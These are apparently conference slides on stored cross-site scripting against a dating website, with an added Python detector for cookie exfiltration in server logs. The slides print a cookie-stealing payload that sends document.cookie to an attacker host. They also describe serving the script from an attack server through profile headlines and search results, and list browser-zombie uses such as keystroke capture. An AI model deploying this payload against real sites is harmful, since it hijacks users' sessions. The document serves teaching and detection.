Caleb Xss Dating Website

  1. Cross-site Scripting Attacks. Caleb Sima, S.P.I Dynamics
  2. Simple XSS Checking
  3. Fill in the forms
  4. User input is reflected back
  5. Let’s try some JavaScript
  6. Bingo!
  7. XSS on a large scale
     • Create a simple profile
     • Which text is seen by the most people?
  8. Let’s run a test
     • Plain vanilla XSS entry in the headline
  9. Let’s view the profile and see what happens
  10. Success!
  11. Does it execute in a displayed list of results?
  12. Yes it does.
  13. Create an external JS file
     • 1. Attacker creates exploit profile
     • 2. Victim executes date search
     • 3. Headline is viewed. Exploited
     • 4. Victim requests attack payload
     • 5. Payload delivered.
     • 6. Victim sends cookie to attacker
     (diagram labels: Dating Website, Attack Server)
  14. Create the exploit payload
     document.write("<img src= http://attacker.com/ " + document.cookie + " width=0 >")
  15. Let’s execute the attack
     • Embed the script to download from the attacker’s server.
  16. View the profile
     • Success. Invisible execution
  17. Execute the attack via search
     • Everything looks normal
  18. Check out the attack logs
     • 2006-08-31 19:54:47 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0
     • 2006-08-31 19:54:47 0.0.0.0 GET /pIDCode=2AD4A95012D09660 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2
     • 2006-08-31 19:55:48 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0
     • 2006-08-31 19:55:48 0.0.0.0 GET /pIDCode=2AD4A95012D01871 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
     • 2006-08-31 19:56:33 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0
     • 2006-08-31 19:56:33 0.0.0.0 GET /pIDCode=2AD4A95012D04309 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
  19. Real Exploitation
     • Browser Zombies
     • Control any victim browser
     • Capture keystrokes
     • Capture browsing activity
     • Force the user to view sites of your choosing
  20. Try WebInspect
     SPI Dynamics, Inc., 115 Perimeter Center Place, Suite 1100, Atlanta, GA 30346
     Caleb Sima, [email_address]
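As an added example (not part of Caleb Sima's slides), a short Python detector that correlates the slide-18 server log lines: it flags a fetch of the attack script followed within seconds, from the same client and User-Agent, by a request whose whole path is a cookie string (name=value) rather than a real resource, which is exactly the footprint the document.cookie payload leaves. The W3C field order (date, time, s-ip, method, uri-stem, uri-query, port, username, c-ip, user-agent, status, substatus, win32-status) is assumed from the slide's layout.

```python
"""Spot document.cookie exfiltration in W3C-style web server logs:
a script fetch (a.js) followed shortly, from the same client and
User-Agent, by a request whose path is a cookie string."""
import re
from datetime import datetime, timedelta

# Log lines as shown on slide 18 (first line's en dash normalised to "-").
LOG_LINES = """\
2006-08-31 19:54:47 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0
2006-08-31 19:54:47 0.0.0.0 GET /pIDCode=2AD4A95012D09660 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2
2006-08-31 19:55:48 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0
2006-08-31 19:55:48 0.0.0.0 GET /pIDCode=2AD4A95012D01871 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
2006-08-31 19:56:33 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0
2006-08-31 19:56:33 0.0.0.0 GET /pIDCode=2AD4A95012D04309 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
"""

# A path that is nothing but "name=value": a cookie pasted into a URL.
COOKIE_PATH = re.compile(r"^/[A-Za-z_][\w.-]*=[^/]+$")


def parse(line):
    # Assumed W3C field order; the User-Agent has its spaces encoded as "+",
    # so a plain whitespace split yields one token per field.
    f = line.split()
    return {"ts": datetime.strptime(f[0] + " " + f[1], "%Y-%m-%d %H:%M:%S"),
            "path": f[4], "client": f[8], "ua": f[9], "status": int(f[10])}


def find_exfil(lines, script="/a.js", window=timedelta(seconds=5)):
    """Return (leaked cookie string, timestamp) for every cookie-shaped request
    that follows a fetch of `script` from the same client+UA within `window`.
    A 304 (cached) fetch of the script still counts as the victim running it."""
    last_script = {}
    hits = []
    for rec in map(parse, filter(None, lines.splitlines())):
        key = (rec["client"], rec["ua"])
        if rec["path"] == script:
            last_script[key] = rec["ts"]
        elif (COOKIE_PATH.match(rec["path"]) and key in last_script
              and rec["ts"] - last_script[key] <= window):
            hits.append((rec["path"][1:], rec["ts"]))
    return hits


if __name__ == "__main__":
    for cookie, ts in find_exfil(LOG_LINES):
        print(ts, "session cookie leaked:", cookie)
```

On the slide's six lines this yields three hits, one per victim; the 404s on the cookie-shaped paths are the attacker's server having nothing to serve, which is why the exfiltration is invisible to the victim but obvious in the log.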